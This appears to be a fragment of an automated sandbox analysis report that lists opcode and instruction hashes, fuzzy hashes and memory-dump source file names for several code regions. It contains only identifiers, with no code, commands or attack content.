                                                                                          • Opcode ID: d2e9f4d7ea2628f9ac72d7765e3d710c239ef18ca4280cc055cff12b30c82ac5
                                                                                          • Instruction ID: 7e8b761cd8473ecfa3bbc0f7e35a7bcec6b453c4254a60458d15f9cd8d4815bf
                                                                                          • Opcode Fuzzy Hash: d2e9f4d7ea2628f9ac72d7765e3d710c239ef18ca4280cc055cff12b30c82ac5
                                                                                          • Instruction Fuzzy Hash: 3D31ED30A1992D8FDBA9EB68C855AA9B3F1FF59300F5141E9D04DE3255CF34AA81CF40
                                                                                          Memory Dump Source
• Source File: 00000000.00000002.1724388683.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd9b8a0000_file.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bf7646f7e1559e4964c0cd756fcaacd3b9362db68b21e2683031c4cc0c0add3b
• Instruction ID: 6be695adba7d8fb563bcc22bd73f7fa4f5e3e70f51e7f12d91228ef334924e0c
• Opcode Fuzzy Hash: bf7646f7e1559e4964c0cd756fcaacd3b9362db68b21e2683031c4cc0c0add3b
• Instruction Fuzzy Hash: AC312971D0452C8BEB68EF14D8A0BF9B3B1EB55304F4140AED04EA7285DE366E8ACF50
Memory Dump Source
• Source File: 00000000.00000002.1724388683.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd9b8a0000_file.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 90b9aa3ad8e06a336b582e433a6d190dd403a74844dcc75b9cec6c989c53cc71
• Instruction ID: c07eda309402cfd6935b5cb7016e9ae5ba79b9eb25be75a40659dce04cba5eec
• Opcode Fuzzy Hash: 90b9aa3ad8e06a336b582e433a6d190dd403a74844dcc75b9cec6c989c53cc71
• Instruction Fuzzy Hash: 3BF0F970E1992DCECBA4EB68C8506FCB3B0FB5A304F4005AAC10DE7251DB359A81CF44
Memory Dump Source
• Source File: 00000000.00000002.1724388683.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd9b8a0000_file.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6e1887d1be01c89d690a864a3c95e18980f27101b7e57f81b6cf656047a9bc81
• Instruction ID: e8dcc36c8649a49f83377c11d86049a447dfbc4570d51bb6c94156aa53de8f1a
• Opcode Fuzzy Hash: 6e1887d1be01c89d690a864a3c95e18980f27101b7e57f81b6cf656047a9bc81
• Instruction Fuzzy Hash: BFF0F970E1952DCEDB64EB68C450AFCB3B0FB59304F4004A9C10DE3151CB359A81CF44
Memory Dump Source
• Source File: 00000000.00000002.1724388683.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd9b8a0000_file.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 27f84774bcf1b1eeb2d2bff7c712cbabb01bd20ca02854db0b469abb770f434b
• Instruction ID: d022ea5b722f4bf736d74f5077a018b49549402f1f745c4517b7188105933b51
• Opcode Fuzzy Hash: 27f84774bcf1b1eeb2d2bff7c712cbabb01bd20ca02854db0b469abb770f434b
• Instruction Fuzzy Hash: 13F0A470E0992D8EDBA4EB68D850AECB3B1FB59305F4115AAC10DE3251DB359A858F44